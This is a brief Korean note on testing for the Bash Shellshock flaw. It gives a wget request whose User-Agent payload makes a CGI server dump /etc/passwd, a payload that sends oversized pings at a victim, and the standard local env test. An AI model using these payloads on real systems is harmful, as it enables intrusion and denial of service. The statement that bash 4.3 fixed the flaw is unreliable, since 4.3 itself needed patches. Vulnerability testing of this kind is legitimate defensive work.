쉘쇼크 공격 진단하기

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/test.cgi

() { :; }; ping -s 1000000 <victim IP>

Shell Shock 테스트 코드 ( Bash version 4.2.50(1) release GNU)

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Shell Shock 취약점은 bash 4.3부터 패치되었다.

bash의 버전체크는 아래와 같이 한다.

bash --version.